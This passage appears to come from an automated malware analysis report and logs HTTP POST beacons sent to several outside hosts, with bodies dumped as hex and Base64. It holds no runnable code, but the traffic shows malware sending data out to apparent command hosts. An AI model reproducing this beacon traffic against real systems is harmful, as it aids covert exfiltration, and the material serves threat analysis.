43 75 49 58 64 78 39 6e 59 52 6a 34 63 4a 62 4a 37 67 62 6e 30 68 63 43 6e 67 43 36 65 47 62 4d 45 30 35 38 56 63 4b 42 6b 3d Data Ascii: ANiaYDRah4wrDSosj0BTHIdndRgsF+4qqPKc3OdjFO6dcG4kv3s2uxMRiGOYktm2DuN4I3bn6LapnrrkY2sx1F/jOwY4y5FFhucRt5cAI4KwLWFPyTwxUXVNfjkenpqJsKZsh/NsxgLMvGr+W6WCUyhPIIT0SeFvu2aMymH8J7B7akJ3VgNOi2jF2/IJOU0Rtwafkqh8l+v/D9E5tUgHO2unOuEkfAYHsqSKCJSztKM/ln77BvWuo7SSt85OGvddIsnMDT0afmYXfWY8PojqE2PZsgQLCskW+zX4YsjdRbjiR3M4KpiHsGYogyHDqIYk0qeaLMw73fvcQZT6QGb52TiP20/PhZWIZFy+tItPCsBDQXb1ScSD7Ue7fDexGmceb7Iw4NOhqCIHCTkh3I9KaMd08GyY2a4fJ1o/TN9d+Uy+x5UInfATOroZFviI5sYIut6mcxZoKb1jynR8GMFievMzNzBd4xCeMt0Uk1qEMV2LgTqfLBXRMmWEUWCuIXdx9nYRj4cJbJ7gbn0hcCngC6eGbME058VcKBk=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.iamdirt.comCache-Control: no-cacheData Raw: 44 6f 6a 68 57 71 41 71 68 34 7a 56 6a 34 5a 54 38 39 33 6e 59 39 50 4f 33 46 49 49 62 73 4e 72 31 48 4f 65 41 4d 74 2f 76 62 6e 69 52 6d 73 78 50 41 53 33 30 2b 54 4f 62 67 52 4a 68 69 6d 6d 56 6f 67 48 6c 78 6a 53 75 65 34 62 37 7a 69 39 63 71 4b 53 30 6f 68 76 39 70 2b 75 32 6c 75 6b 4e 31 76 54 6e 30 63 4c 2b 6e 45 62 46 4b 2f 72 58 30 57 74 59 72 37 68 72 69 43 49 55 55 46 33 51 43 43 69 50 43 58 46 74 2b 52 47 6a 69 76 73 43 59 35 2f 45 70 6f 55 77 2f 6f 2f 67 6d 62 41 4b 67 68 6e 43 4e 36 49 55 43 2b 4b 76 68 39 31 4b 4e 42 65 4c 67 30 48 6b 36 50 2b 36 71 62 4f 76 32 51 76 42 7a 59 48 75 46 45 46 7a 53 48 46 2b 79 38 4e 4f 6a 37 44 4d 54 32 68 2b 2f 74 49 74 31 57 42 69 6c 6e 33 38 5a 42 4c 79 73 44 2b 44 43 52 71 70 73 57 6c 55 48 48 47 68 6f 70 4a 61 55 46 46 6b 31 69 42 4d 69 53 67 78 53 50 34 4c 59 2f 33 4a 31 54 66 71 7a 7a 73 4c 58 61 30 78 69 4e 2f 37 56 76 4b 30 74 31 45 59 53 67 75 78 6f 48 36 4b 5a 6c 4b 71 72 6c 75 33 49 44 64 6f 6b 5a 6b 57 38 47 62 35 63 50 78 64 48 74 44 78 78 57 6a 77 30 30 63 4f 32 36 4b 51 4c 2f 4a 79 2b 4e 6a 70 78 65 2b 38 36 68 59 58 55 63 64 6f 75 30 72 53 6e 71 59 71 32 4c 6d 41 2b 51 65 67 61 31 59 44 66 71 67 77 66 5a 66 67 4e 33 47 52 70 48 34 4c 56 41 38 51 30 42 32 75 54 67 75 4c 59 56 61 34 42 4a 65 55 4c 55 31 6f 4b 7a 65 71 61 44 36 39 50 38 42 45 32 4c 2f 34 4d 72 4c 6d 76 31 6b 69 6b 36 2f 4a 31 42 39 48 71 33 51 42 55 74 38 39 75 74 33 6c 66 48 72 65 69 57 75 6b 6d 5a 59 69 71 65 74 37 64 79 49 77 35 71 61 50 68 76 32 4f 76 6b 69 33 45 45 68 75 6d 38 37 4d 74 54 31 69 46 62 59 2b 4a 56 75 6b 35 30 78 6c 71 51 61 6a 6f 72 4d 44 6d 78 6f Data Ascii: DojhWqAqh4zVj4ZT893nY9PO3FIIbsNr1HOeAMt/vbniRmsxPAS30+TObgRJhimmVogHlxjSue4b7zi9cqKS0ohv9p+u2lukN1vTn0cL+nEbFK/rX0WtYr7hriCIUUF3QCCiPCXFt+RGjivsCY5/EpoUw/o/gmbAKghnCN6IUC+Kvh91KNBeLg0Hk6P+6qbOv2QvBzYHuFEFzSHF+y8NOj7DMT2h+/tIt1WBiln38ZBLysD+DCRqpsWlUHHGhopJaUFFk1iBMiSgxSP4LY/3J1TfqzzsLXa0xiN/7VvK0t1EYSguxoH6KZlKqrlu3IDdokZkW8Gb5cPxdHtDxxWjw00cO26KQL/Jy+Njpxe+86hYXUcdou0rSnqYq2LmA+Qega1YDfqgwfZfgN3GRpH4LVA8Q0B2uTguLYVa4BJeULU1oKzeqaD69P8BE2L/4MrLmv1kik6/J1B9Hq3QBUt89ut3lfHreiWukmZYiqet7dyIw5qaPhv2Ovki3EEhum87MtT1iFbY+JVuk50xlqQajorMDmxo
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vazir.seCache-Control: no-cacheCookie: btst=14d34012b627d917de443054740519bb|84.17.52.5|1688537190|1688537169|10|2|0; snkz=84.17.52.5Data Raw: 57 4d 53 79 5a 41 4d 73 66 34 7a 51 66 62 77 37 43 6d 47 34 56 69 78 4a 76 61 43 70 32 6d 51 70 35 31 45 69 36 4a 70 39 75 4b 6e 4f 74 5a 33 50 4e 6c 58 6c 54 31 71 53 77 47 6b 67 61 48 44 51 62 77 6a 68 53 69 47 41 71 4b 4d 66 31 38 46 46 4a 70 36 42 5a 56 70 2b 5a 61 72 71 44 33 72 68 49 6d 4c 68 31 47 63 42 36 55 2f 39 34 45 41 44 35 2b 47 62 51 58 47 55 6a 30 61 63 35 64 73 49 46 34 33 77 42 44 51 41 55 79 43 7a 5a 72 50 72 77 67 73 4a 41 76 45 45 58 43 48 50 4e 6a 4a 43 4b 54 42 70 4d 38 49 39 7a 61 4d 57 34 32 72 72 6b 6a 48 38 55 51 41 37 52 77 4b 68 39 50 32 39 79 2f 39 36 32 48 37 2b 2b 6b 32 53 53 4d 58 66 6a 77 61 46 62 6c 6e 39 74 4b 48 48 49 36 2b 53 4c 54 51 77 2b 77 76 49 6c 68 63 4b 56 6e 62 5a 68 42 4b 58 67 45 50 34 73 67 69 34 4f 67 6c 53 47 68 4d 66 57 77 45 57 42 56 36 6b 43 42 5a 64 63 67 6d 31 6e 4d 54 34 4f 59 78 38 51 4d 77 5a 71 36 49 33 44 75 51 76 53 37 64 71 34 47 72 37 43 30 69 4b 6a 30 56 41 64 54 5a 33 51 7a 57 37 47 78 79 4e 68 68 39 31 74 32 6b 56 72 56 6c 32 64 2b 2b 48 4e 62 4b 59 39 30 46 70 7a 73 44 38 79 43 42 50 66 77 2b 4c 58 32 66 4d 7a 6c 64 30 42 43 49 77 79 2f 4a 73 33 77 54 65 61 6f 4d 37 6e 4c 42 76 48 2f 4c 6c 36 68 46 63 72 6a 71 57 6f 44 72 72 68 52 69 45 6d 39 72 72 37 37 31 75 51 79 6d 4a 6d 2b 42 67 31 4f 68 68 6f 31 54 61 30 49 53 35 71 30 4c 50 7a 74 64 45 71 4a 48 51 61 65 55 48 67 74 4a 42 6c 35 59 46 6e 59 7a 67 6d 52 32 56 30 54 45 47 76 74 62 6c 30 79 38 4d 63 64 52 4e 78 41 73 58 58 73 4d 7a 54 69 58 57 43 58 6e 45 56 42 45 56 6d 37 62 4a 78 35 4a 55 58 2f 35 42 69 63 51 48 43 68 75 69 52 4a 6e 78 51 6e 32 71 71 45 79 6c 41 62 39 50 Data Ascii: WMSyZAMsf4zQfbw7CmG4VixJvaCp2mQp51Ei6Jp9uKnOtZ3PNlXlT1qSwGkgaHDQbwjhSiGAqKMf18FFJp6BZVp+ZarqD3rhImLh1GcB6U/94EAD5+GbQXGUj0ac5dsIF43wBDQAUyCzZrPrwgsJAvEEXCHPNjJCKTBpM8I9zaMW42rrkjH8UQA7RwKh9P29y/962H7++k2SSMXfjwaFbln9tKHHI6+SLTQw+wvIlhcKVnbZhBKXgEP4sgi4OglSGhMfWwEWBV6kCBZdcgm1nMT4OYx8QMwZq6I3DuQvS7dq4Gr7C0iKj0VAdTZ3QzW7GxyNhh91t2kVrVl2d++HNbKY90FpzsD8yCBPfw+LX2fMzld0BCIwy/Js3wTeaoM7nLBvH/Ll6hFcrjqWoDrrhRiEm9rr771uQymJm+Bg1Ohho1Ta0IS5q0LPztdEqJHQaeUHgtJBl5YFnYzgmR2V0TEGvtbl0y8McdRNxAsXXsMzTiXWCXnEVBEVm7bJx5JUX/5BicQHChuiRJnxQn2qqEylAb9P
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.wifi4all.nlCache-Control: no-cacheData Raw: 6b 79 6d 74 4b 63 72 68 6a 59 79 6f 68 47 4d 46 4c 65 5a 54 39 49 33 4e 54 70 68 36 4c 63 32 6a 6e 74 69 4e 49 44 53 2f 53 58 75 61 53 61 68 46 71 6d 54 4a 54 79 4f 46 4f 74 4b 71 65 50 71 76 4b 4d 48 6c 50 74 6a 54 49 45 37 72 75 74 4f 66 4e 31 4b 6e 45 47 62 77 38 77 58 36 61 59 55 68 38 68 6e 75 6c 52 46 6d 4a 76 62 46 66 49 33 61 31 4d 48 44 65 34 57 43 69 72 58 6c 35 45 54 6a 52 62 47 57 35 36 33 4d 77 38 4c 72 4f 68 43 65 78 77 54 68 4b 33 50 2b 42 33 42 77 67 4e 5a 79 49 53 38 6b 74 67 32 78 32 51 58 68 6e 6a 56 36 39 47 73 63 61 4c 51 31 50 4e 35 58 45 4b 52 4e 38 4f 65 38 5a 4f 57 59 46 4d 6c 47 61 43 38 32 56 63 71 36 6e 2f 44 45 7a 53 51 63 76 76 4e 78 4f 74 43 6f 70 6c 45 62 6e 35 74 45 50 4f 6d 4c 2f 5a 72 32 35 53 33 75 74 2f 55 4b 37 39 33 61 75 79 36 67 6f 55 69 59 5a 49 68 6d 35 50 59 5a 46 67 71 72 76 4e 54 59 4e 54 71 6d 6a 75 5a 4e 61 64 77 34 4f 58 4a 56 6c 76 6e 6d 4f 2b 4c 69 67 72 52 62 6b 30 49 6d 6e 45 38 76 56 58 55 56 78 54 4a 77 68 68 33 33 38 50 4e 45 73 35 72 50 51 7a 4d 74 32 56 5a 6a 31 70 57 68 36 55 45 52 47 4a 31 62 4c 77 5a 33 6e 5a 32 4a 76 7a 2f 44 37 43 48 7a 34 78 74 57 75 69 65 2f 63 52 64 74 37 73 65 55 59 30 71 73 75 36 34 36 57 55 6b 39 50 69 35 42 69 73 73 75 64 6a 64 49 45 54 78 4b 66 75 44 44 50 42 61 64 41 57 62 6a 43 47 6c 63 4c 69 61 4a 64 67 69 65 6a 42 44 64 46 41 64 58 68 6c 4e 42 39 4c 55 66 36 55 58 79 39 72 64 62 57 48 6f 73 53 32 39 49 41 41 33 44 37 38 66 75 47 50 61 70 70 4f 79 6d 4c 4c 67 39 58 76 52 46 39 6c 5a 32 57 6c 5a 4f 32 7a 33 45 54 65 38 75 36 47 46 68 57 36 68 6f 2b 4f 67 66 6b 6a 52 73 75 45 4c 47 6d 67 36 63 73 56 33 45 4d 41 4e 57 73 6d 57 73 45 38 63 32 53 70 38 6f 77 51 3d 3d Data Ascii: kymtKcrhjYyohGMFLeZT9I3NTph6Lc2jntiNIDS/SXuaSahFqmTJTyOFOtKqePqvKMHlPtjTIE7rutOfN1KnEGbw8wX6aYUh8hnulRFmJvbFfI3a1MHDe4WCirXl5ETjRbGW563Mw8LrOhCexwThK3P+B3BwgNZyIS8ktg2x2QXhnjV69GscaLQ1PN5XEKRN8Oe8ZOWYFMlGaC82Vcq6n/DEzSQcvvNxOtCoplEbn5tEPOmL/Zr25S3ut/UK793auy6goUiYZIhm5PYZFgqrvNTYNTqmjuZNadw4OXJVlvnmO+LigrRbk0ImnE8vVXUVxTJwhh338PNEs5rPQzMt2VZj1pWh6UERGJ1bLwZ3nZ2Jvz/D7CHz4xtWuie/cRdt7seUY0qsu646WUk9Pi5BissudjdIETxKfuDDPBadAWbjCGlcLiaJdgiejBDdFAdXhlNB9LUf6UXy9rdbWHosS29IAA3D78fuGPappOymLLg9XvRF9lZ2WlZO2z3ETe8u6GFhW6ho+OgfkjRsuELGmg6csV3EMANWsmWsE8c2Sp8owQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.crcsi.orgCache-Control: no-cacheData Raw: 39 39 6d 44 34 69 4e 2f 48 34 78 69 74 4e 78 4a 71 6c 6f 62 55 55 79 70 63 77 35 4a 50 42 54 4a 42 30 38 54 78 30 79 31 2b 53 4d 58 2f 76 53 72 70 62 73 4f 43 68 79 43 6e 67 63 46 77 7a 4c 39 65 34 77 76 6a 58 63 55 49 35 62 37 51 6a 75 4a 45 62 69 51 72 65 4f 33 6e 50 4c 53 57 30 39 32 71 35 43 57 41 4b 72 63 77 50 54 65 56 42 63 36 4b 35 66 4b 36 47 67 30 50 66 79 55 62 31 71 43 5a 69 2b 71 4d 61 48 48 49 55 46 70 62 6e 39 2b 4f 63 5a 52 62 75 61 4b 5a 4c 34 59 54 6a 38 41 31 71 34 48 67 55 53 42 31 55 4e 5a 34 4a 41 66 42 65 50 39 31 6a 4e 5a 58 37 64 45 75 36 5a 32 71 44 36 57 64 65 52 2f 4f 33 62 77 67 47 70 50 48 48 64 68 30 46 76 51 49 37 56 75 71 36 31 46 34 50 78 35 32 49 66 63 43 45 69 39 58 32 4d 6d 31 63 52 31 57 78 65 33 62 35 77 73 32 53 57 57 4b 32 47 33 4d 70 54 4c 56 44 2f 4e 31 57 70 54 68 56 62 7a 33 75 6b 72 62 54 74 4a 70 42 48 7a 4d 6e 33 38 33 70 6a 79 70 4e 61 69 33 72 52 56 65 71 6d 42 61 79 53 37 55 62 70 78 78 34 30 76 4c 45 70 69 63 65 54 58 36 67 69 5a 39 76 52 61 4f 57 4c 36 67 44 6e 63 59 7a 68 56 6e 39 35 47 59 77 38 68 4b 2b 42 79 38 79 59 52 4e 75 45 5a 78 66 73 77 58 4e 42 52 4e 68 47 6e 37 66 6b 30 77 31 61 36 48 4a 47 4c 70 2b 4d 38 55 5a 78 62 6b 64 76 31 71 68 46 38 6c 42 71 71 41 32 59 70 4b 4d 64 4d 51 35 73 6d 7a 56 68 55 30 2b 51 31 59 49 38 2f 62 33 6a 6c 42 4e 71 72 57 67 44 6a 36 7a 35 52 67 39 6e 74 4c 51 67 72 67 73 36 41 54 38 33 30 47 71 64 5a 62 79 43 57 31 53 39 71 6a 4b 63 6a 31 4c 64 50 42 32 50 58 2b 62 41 61 78 31 53 65 71 61 35 71 41 6a 2f 72 6a 68 4e 6c 66 38 61 6d 7a 51 68 6f 47 4b 52 76 59 69 4c 66 Data Ascii: 99mD4iN/H4xitNxJqlobUUypcw5JPBTJB08Tx0y1+SMX/vSrpbsOChyCngcFwzL9e4wvjXcUI5b7QjuJEbiQreO3nPLSW092q5CWAKrcwPTeVBc6K5fK6Gg0PfyUb1qCZi+qMaHHIUFpbn9+OcZRbuaKZL4YTj8A1q4HgUSB1UNZ4JAfBeP91jNZX7dEu6Z2qD6WdeR/O3bwgGpPHHdh0FvQI7Vuq61F4Px52IfcCEi9X2Mm1cR1Wxe3b5ws2SWWK2G3MpTLVD/N1WpThVbz3ukrbTtJpBHzMn383pjypNai3rRVeqmBayS7Ubpxx40vLEpiceTX6giZ9vRaOWL6gDncYzhVn95GYw8hK+By8yYRNuEZxfswXNBRNhGn7fk0w1a6HJGLp+M8UZxbkdv1qhF8lBqqA2YpKMdMQ5smzVhU0+Q1YI8/b3jlBNqrWgDj6z5Rg9ntLQgrgs6AT830GqdZbyCW1S9qjKcj1LdPB2PX+bAax1Seqa5qAj/rjhNlf8amzQhoGKRvYiLf
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 41 4e 69 61 59 44 52 61 68 34 77 72 44 53 6f 73 6a 30 42 54 48 49 64 6e 64 52 67 73 46 2b 34 71 71 50 4b 63 33 4f 64 6a 46 4f 36 64 63 47 34 6b 76 33 73 32 75 78 4d 52 69 47 4f 59 6b 74 6d 32 44 75 4e 34 49 33 62 6e 36 4c 61 70 6e 72 72 6b 59 32 73 78 31 46 2f 6a 4f 77 59 34 79 35 46 46 68 75 63 52 74 35 63 41 49 34 4b 77 4c 57 46 50 79 54 77 78 55 58 56 4e 66 6a 6b 65 6e 70 71 4a 73 4b 5a 73 68 2f 4e 73 78 67 4c 4d 76 47 72 2b 57 36 57 43 55 79 68 50 49 49 54 30 53 65 46 76 75 32 61 4d 79 6d 48 38 4a 37 42 37 61 6b 4a 33 56 67 4e 4f 69 32 6a 46 32 2f 49 4a 4f 55 30 52 74 77 61 66 6b 71 68 38 6c 2b 76 2f 44 39 45 35 74 55 67 48 4f 32 75 6e 4f 75 45 6b 66 41 59 48 73 71 53 4b 43 4a 53 7a 74 4b 4d 2f 6c 6e 37 37 42 76 57 75 6f 37 53 53 74 38 35 4f 47 76 64 64 49 73 6e 4d 44 54 30 61 66 6d 59 58 66 57 59 38 50 6f 6a 71 45 32 50 5a 73 67 51 4c 43 73 6b 57 2b 7a 58 34 59 73 6a 64 52 62 6a 69 52 33 4d 34 4b 70 69 48 73 47 59 6f 67 79 48 44 71 49 59 6b 30 71 65 61 4c 4d 77 37 33 66 76 63 51 5a 54 36 51 47 62 35 32 54 69 50 32 30 2f 50 68 5a 57 49 5a 46 79 2b 74 49 74 50 43 73 42 44 51 58 62 31 53 63 53 44 37 55 65 37 66 44 65 78 47 6d 63 65 62 37 49 77 34 4e 4f 68 71 43 49 48 43 54 6b 68 33 49 39 4b 61 4d 64 30 38 47 79 59 32 61 34 66 4a 31 6f 2f 54 4e 39 64 2b 55 79 2b 78 35 55 49 6e 66 41 54 4f 72 6f 5a 46 76 69 49 35 73 59 49 75 74 36 6d 63 78 5a 6f 4b 62 31 6a 79 6e 52 38 47 4d 46 69 65 76 4d 7a 4e 7a 42 64 34 78 43 65 4d 74 30 55 6b 31 71 45 4d 56 32 4c 67 54 71 66 4c 42 58 52 4d 6d 57 45 55 57 43 75 49 58 64 78 39 6e 59 52 6a 34 63 4a 62 4a 37 67 62 6e 30 68 63 43 6e 67 43 36 65 47 62 4d 45 30 35 38 56 63 4b 42 6b 3d Data Ascii: ANiaYDRah4wrDSosj0BTHIdndRgsF+4qqPKc3OdjFO6dcG4kv3s2uxMRiGOYktm2DuN4I3bn6LapnrrkY2sx1F/jOwY4y5FFhucRt5cAI4KwLWFPyTwxUXVNfjkenpqJsKZsh/NsxgLMvGr+W6WCUyhPIIT0SeFvu2aMymH8J7B7akJ3VgNOi2jF2/IJOU0Rtwafkqh8l+v/D9E5tUgHO2unOuEkfAYHsqSKCJSztKM/ln77BvWuo7SSt85OGvddIsnMDT0afmYXfWY8PojqE2PZsgQLCskW+zX4YsjdRbjiR3M4KpiHsGYogyHDqIYk0qeaLMw73fvcQZT6QGb52TiP20/PhZWIZFy+tItPCsBDQXb1ScSD7Ue7fDexGmceb7Iw4NOhqCIHCTkh3I9KaMd08GyY2a4fJ1o/TN9d+Uy+x5UInfATOroZFviI5sYIut6mcxZoKb1jynR8GMFievMzNzBd4xCeMt0Uk1qEMV2LgTqfLBXRMmWEUWCuIXdx9nYRj4cJbJ7gbn0hcCngC6eGbME058VcKBk=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.quadlock.comCache-Control: no-cacheData Raw: 46 6a 45 4b 71 6b 6e 62 56 34 79 6b 68 42 77 42 6d 43 78 6c 79 47 49 71 46 67 64 6e 47 6c 46 65 6a 63 49 63 70 74 48 6c 72 45 43 31 78 4f 7a 75 77 55 43 67 70 61 4c 6a 4d 6d 61 2f 76 38 41 75 57 53 4e 49 44 65 38 35 52 59 62 4d 52 74 4b 73 7a 34 6e 46 4b 2f 48 61 56 30 6d 61 55 56 6b 76 78 58 72 37 4d 33 6d 46 79 32 58 66 6c 37 6b 55 66 6a 6d 72 72 71 73 37 56 31 35 7a 53 44 67 44 72 67 4d 78 54 50 7a 72 31 7a 43 72 45 54 43 45 57 67 51 71 6c 53 77 73 76 39 57 6d 2f 44 77 50 66 4f 46 57 72 59 32 6c 6c 63 6b 56 6f 44 56 2f 46 46 4b 4e 48 72 5a 6c 4d 7a 44 36 70 69 58 75 48 49 4d 62 70 4b 52 4f 42 54 46 57 6a 6b 4f 37 65 74 78 58 6d 41 38 58 31 66 68 66 4f 4f 4a 64 38 30 49 4f 77 54 34 61 51 2f 51 36 49 4d 66 63 6d 4f 34 73 33 39 46 63 61 41 38 66 71 76 44 53 6c 4c 55 6a 67 70 39 43 35 54 78 5a 5a 48 35 70 77 77 32 42 5a 6b 72 72 70 71 30 37 4a 5a 74 74 70 6d 4f 44 79 36 37 67 6f 49 6c 38 56 6b 4e 78 4a 37 6e 4b 75 45 75 78 66 7a 6f 4e 73 4d 63 54 53 47 66 44 34 51 63 30 74 55 63 66 53 72 78 37 74 73 2f 42 71 56 56 73 7a 32 75 37 46 68 62 61 38 53 54 35 43 62 2b 32 4c 37 45 49 6f 4e 55 79 71 36 6e 76 50 67 4a 77 59 36 56 55 39 59 4d 61 4b 76 6c 74 6a 35 78 37 6b 64 35 4e 79 55 48 58 45 6f 4e 32 6b 4a 58 42 4d 36 47 30 51 73 59 37 71 57 62 53 63 79 64 76 50 2f 6e 53 47 35 44 6a 4c 68 45 73 4c 4b 4b 57 76 42 58 48 70 2b 30 64 55 79 4f 72 44 4b 59 64 38 59 52 78 4b 70 75 76 58 65 49 4f 71 56 58 2f 42 77 33 53 6d 68 6c 30 78 64 36 4d 4b 48 45 59 30 55 45 59 30 71 56 62 63 32 53 51 5a 58 34 50 4c 48 72 69 6c 31 41 72 53 62 71 65 4a 63 66 61 75 45 56 75 77 33 63 63 64 42 79 75 6c 71 72 6a 6e 37 45 3d Data Ascii: FjEKqknbV4ykhBwBmCxlyGIqFgdnGlFejcIcptHlrEC1xOzuwUCgpaLjMma/v8AuWSNIDe85RYbMRtKsz4nFK/HaV0maUVkvxXr7M3mFy2Xfl7kUfjmrrqs7V15zSDgDrgMxTPzr1zCrETCEWgQqlSwsv9Wm/DwPfOFWrY2llckVoDV/FFKNHrZlMzD6piXuHIMbpKROBTFWjkO7etxXmA8X1fhfOOJd80IOwT4aQ/Q6IMfcmO4s39FcaA8fqvDSlLUjgp9C5TxZZH5pww2BZkrrpq07JZttpmODy67goIl8VkNxJ7nKuEuxfzoNsMcTSGfD4Qc0tUcfSrx7ts/BqVVsz2u7Fhba8ST5Cb+2L7EIoNUyq6nvPgJwY6VU9YMaKvltj5x7kd5NyUHXEoN2kJXBM6G0QsY7qWbScydvP/nSG5DjLhEsLKKWvBXHp+0dUyOrDKYd8YRxKpuvXeIOqVX/Bw3Smhl0xd6MKHEY0UEY0qVbc2SQZX4PLHril1ArSbqeJcfauEVuw3ccdByulqrjn7E=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.alteor.clCache-Control: no-cacheData Raw: 6c 31 68 4b 61 4b 4c 35 64 6f 7a 4d 4d 72 57 57 46 53 7a 43 4a 69 55 76 41 65 30 79 2f 76 34 6c 39 6b 45 76 52 54 61 62 70 42 57 53 39 59 45 42 54 79 77 31 43 6e 47 48 55 39 63 64 61 6c 66 6d 6d 69 65 34 4b 4d 58 77 47 71 6c 54 70 66 34 58 61 2b 61 35 5a 4d 31 74 4b 59 63 43 2f 66 58 6c 55 7a 69 2f 5a 68 2f 4d 2b 38 4c 6c 41 69 59 6e 2b 6c 66 2f 4c 4a 34 61 43 74 6d 74 4f 4f 6e 64 48 67 5a 36 6e 58 37 51 64 55 4e 5a 76 6c 52 56 49 6a 59 35 48 4a 4b 71 75 6c 78 4d 38 7a 34 67 37 31 66 46 32 55 41 56 6b 35 4b 63 63 52 79 59 6a 61 2f 65 33 44 6c 69 30 30 41 72 43 71 58 35 31 48 4f 54 4a 54 55 5a 36 7a 53 70 4f 7a 41 69 4f 37 32 68 6f 33 75 57 71 7a 50 73 56 44 4f 42 33 36 4f 56 4f 46 4e 55 57 30 6b 6e 5a 73 4d 30 4e 6b 4f 49 57 2b 6a 55 32 41 7a 6d 4d 78 30 48 65 2b 32 33 57 63 2b 64 48 72 52 78 47 56 55 4a 6f 73 68 7a 73 35 73 51 74 33 70 4c 73 79 68 72 33 4c 6a 74 34 32 57 39 49 36 59 58 4a 58 57 63 4d 67 47 2b 70 6f 47 2b 72 6c 38 4e 38 56 6e 6f 39 65 6e 76 32 78 41 74 63 59 45 4e 5a 70 37 42 37 72 4a 39 61 32 39 77 5a 6b 43 2b 44 66 50 4d 33 51 37 4a 5a 45 6f 76 65 59 2f 31 49 52 4f 46 50 6d 43 56 6d 76 46 71 6d 6b 47 7a 53 64 64 6c 6a 46 45 76 30 5a 43 59 6e 4d 2b 49 77 64 72 6a 45 46 44 2f 6c 71 74 59 51 75 4d 76 44 55 67 38 53 41 66 46 73 36 35 54 49 4e 72 61 2f 72 51 55 65 73 46 68 31 44 4b 2f 4d 71 70 79 50 6d 44 62 2f 4a 50 63 49 45 77 2b 58 62 62 6b 47 42 73 49 73 59 54 42 6c 37 43 58 55 61 6d 7a 6c 49 4e 53 65 36 6c 54 63 37 35 33 31 64 50 64 72 53 61 36 72 45 4f 2b 33 5a 2b 6b 65 65 71 35 6f 4a 70 46 67 72 6b 42 4c 32 35 5a 36 7a 68 45 33 50 59 32 43 52 64 48 30 48 56 54 75 4e 4c 30 42 33 36 53 37 44 43 46 7a 59 72 6a 69 77 49 2b 43 63 58 54 67 53 6b 62 47 47 48 49 68 44 61 36 5a 33 4a 69 74 61 61 49 55 36 35 62 7a 77 3d 3d Data Ascii: l1hKaKL5dozMMrWWFSzCJiUvAe0y/v4l9kEvRTabpBWS9YEBTyw1CnGHU9cdalfmmie4KMXwGqlTpf4Xa+a5ZM1tKYcC/fXlUzi/Zh/M+8LlAiYn+lf/LJ4aCtmtOOndHgZ6nX7QdUNZvlRVIjY5HJKqulxM8z4g71fF2UAVk5KccRyYja/e3Dli00ArCqX51HOTJTUZ6zSpOzAiO72ho3uWqzPsVDOB36OVOFNUW0knZsM0NkOIW+jU2AzmMx0He+23Wc+dHrRxGVUJoshzs5sQt3pLsyhr3Ljt42W9I6YXJXWcMgG+poG+rl8N8Vno9env2xAtcYENZp7B7rJ9a29wZkC+DfPM3Q7JZEoveY/1IROFPmCVmvFqmkGzSddljFEv0ZCYnM+IwdrjEFD/lqtYQuMvDUg8SAfFs65TINra/rQUesFh1DK/MqpyPmDb/JPcIEw+XbbkGBsIsYTBl7CXUamzlINSe6lTc7531dPdrSa6rEO+3Z+keeq5oJpFgrkBL25Z6zhE3PY2CRdH0HVTuNL0B36S7DCFzYrjiwI+CcXTgSkbGGHIhDa6Z3JitaaIU65bzw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pdqhomes.comCache-Control: no-cacheData Raw: 2f 54 4d 4a 6f 43 43 49 56 34 77 37 61 34 71 75 63 35 77 39 69 46 4f 45 42 41 6d 49 47 54 43 64 56 4f 6d 43 6d 77 34 53 35 37 35 34 38 6b 38 36 6a 30 59 39 77 4d 73 59 75 70 30 2f 34 70 58 69 78 76 4f 6c 4a 50 32 4f 69 77 35 42 63 58 6e 6b 66 32 48 48 69 6a 66 67 53 69 4f 6f 4e 57 37 49 6e 6a 67 6b 6a 7a 5a 78 35 66 77 2b 38 53 54 35 36 44 42 32 36 4d 2f 4e 79 37 48 67 53 77 39 47 65 44 72 70 6c 2f 5a 73 7a 64 66 76 45 75 70 66 78 6e 37 4a 51 54 6d 6e 46 79 73 76 76 45 48 2f 6b 43 4b 56 4c 69 41 35 63 51 33 30 33 71 6b 77 44 4f 30 4e 50 61 58 76 56 76 36 47 34 64 44 44 72 7a 43 41 35 35 33 77 69 35 72 66 48 61 49 59 58 4b 51 50 7a 52 37 35 64 75 48 53 57 43 75 4a 63 74 6b 59 70 4c 30 2f 4d 62 39 73 4b 2b 42 55 54 46 61 37 2f 79 6a 58 67 79 78 6f 76 34 7a 42 44 51 31 49 51 6b 7a 2f 61 72 4a 69 32 4b 6b 75 6c 4b 2b 51 42 4f 4f 51 48 48 4f 32 2f 33 4d 54 6f 42 42 52 6a 66 32 6c 66 39 59 7a 6f 41 36 41 34 66 5a 4e 67 54 2f 52 71 34 7a 54 39 48 37 33 61 50 57 73 43 5a 66 6e 56 75 4c 37 30 69 78 37 50 36 2f 68 46 76 77 51 72 5a 4d 57 61 49 46 53 62 45 65 4c 64 66 53 61 51 68 5a 56 53 78 74 78 77 53 4c 55 47 44 37 